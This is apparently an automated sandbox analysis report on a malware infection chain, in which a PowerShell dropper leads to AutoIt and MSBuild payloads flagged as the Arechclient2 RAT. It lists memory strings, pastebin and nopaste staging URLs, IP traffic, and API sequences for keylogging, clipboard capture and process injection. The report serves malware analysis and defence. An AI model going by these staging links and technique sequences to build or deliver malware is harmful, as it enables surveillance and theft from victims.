                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.000000000513C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005130000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005148000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000050FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.000000000510B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000050A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000050F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005120000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GKvThLsGIjD-3KW32JCZ0mH01QvjulstQQuqXTlrEycWV1xiEPH6R
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000540D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GM3ThLsGIjCtpWH8rTPfgJ9HY11EkZX-MaTb-y6a0RAG3u7kf-ivt
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005134000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D07bbdd56f84a91b2:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D1b21e1938b173488:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D263b62db633173b7:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D415b9979ef9707d3:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D4edbbc5636b91633:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000510F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5312552b7084d89d:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000514C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5c9740ab0f014298:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005054000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D6f35d797be3b4dc6:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Db212ceae686b1a2b:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dcdda55c2ba0f73fc:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000511B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Df1b0eeacb1f5bf1d:TM%
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/a/index.js
                    Source: powershell.exe, 00000004.00000002.3839692541.00000000047B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nopaste.net
                    Source: powershell.exe, 00000004.00000002.3838008180.00000000008C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nopaste.net/SFHgtxFGtB
                    Source: powershell.exe, 00000002.00000002.2542129886.0000000005DF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3849414206.00000000056CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: MSBuild.exe, 00000016.00000002.1975336406.0000000002751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/nGmga9WQ
                    Source: MSBuild.exe, 00000014.00000002.1900948474.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000016.00000002.1975336406.0000000002751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/nGmga9WQPO
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://rrb.gov/
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                    Source: AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                    Source: powershell.exe, 00000004.00000002.3839692541.0000000004933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3866570932.0000000009341000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000000E.00000002.1759556958.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752563394.0000000005D09000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1752324052.0000000005A44000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000000E.00000003.1751299607.0000000005C2F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000002.1903110494.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896269134.00000000054AF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896699206.00000000052C4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000010.00000003.1896814705.0000000005589000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000002.1978034404.000000000566F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970916028.0000000005484000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1971061934.0000000005749000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000015.00000003.1970447343.000000000566F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GIHThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GInThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005144000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJHThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GJrThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000512C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GKPThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLPThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000005107000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GLzThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.00000000052AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GM3ThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GMTThLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000505A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2533539728.0000000005066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPDShLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.00000000050BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://google.com/a/cpanel/index.js&q=EgQILnu9GPjShLsGI
                    Source: powershell.exe, 00000002.00000002.2533539728.000000000540D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comHr
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.improveirs.org
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.irs.gov
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/Advocate/Local-Taxpayer-Advocate
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/Advocate/Systemic-Advocacy-Management-System-SAMS
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/VirtualCurrencyfaqs
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/about-irs/strategic-plan/direct-file
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/form1040
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/forms-pubs
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/freefile
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/irb/2006-40_IRB#NOT-2006-83
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/irb/2014-44_IRB#RP-2014-55
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/itin
                    Source: powershell.exe, 00000002.00000002.2533539728.0000000004DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.irs.gov/pub/irs-pdf/i1040gi.pdf
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/pub/irs-pdf/p4134.pdf
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/taxtopics/tc154.html
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/taxtopics/tc553.html
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/taxtopics/tc756.html
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/taxtopics/tc901.html
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/uac/private-delivery-services-pds
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.irs.gov/uac/submission-processing-center-street-addresses-for-private-delivery-service-p
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.ssa.gov/forms/ss-5.pdf
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.ssa.gov/myaccount/
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.taxpayeradvocate.irs.gov/
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.taxpayeradvocate.irs.gov/contact-us
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.taxpayeradvocate.irs.gov/get-help/taxpayer-rights/
                    Source: A9g7lxq1_1gotm7h_698.tmp.6.drString found in binary or memory: https://www.taxpayeradvocate.irs.gov/litcmap
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownHTTPS traffic detected: 174.138.125.138:443 -> 192.168.2.8:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.87.65:443 -> 192.168.2.8:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49714 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.19.228:443 -> 192.168.2.8:49759 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.181.142:443 -> 192.168.2.8:49790 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_0712BEE0 SetWindowsHookExW 0000000D,00000000,?,?15_2_0712BEE0
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01034632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,14_2_01034632
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01034830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_01034830
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A14830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,16_2_00A14830
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01034632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,14_2_01034632
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01020508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,14_2_01020508
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0104D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,14_2_0104D164
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_00A2D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_00A2D164
                    Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 3148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: AutoIt3.exe PID: 1296, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_016070C9 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject,14_2_016070C9

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: amsi32_7608.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: 16.3.AutoIt3.exe.54c5d6c.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 21.2.AutoIt3.exe.44b6e70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 14.2.updater.exe.4a76e70.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 14.2.updater.exe.4a76e70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 21.2.AutoIt3.exe.44b6e70.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 16.2.AutoIt3.exe.42f6e70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 16.2.AutoIt3.exe.42f6e70.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: 20.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Powershell drops PE file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\33260509\updater.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_0160A551 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,14_2_0160A551
                    Source: C:\faggbgb\AutoIt3.exeCode function: 16_2_010A82A9 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount,16_2_010A82A9
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01024365: CreateFileW,_memset,DeviceIoControl,CloseHandle,14_2_01024365
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01018F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_01018F2E
                    Source: C:\Users\user\AppData\Local\Temp\33260509\updater.exeCode function: 14_2_01025778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,14_2_01025778
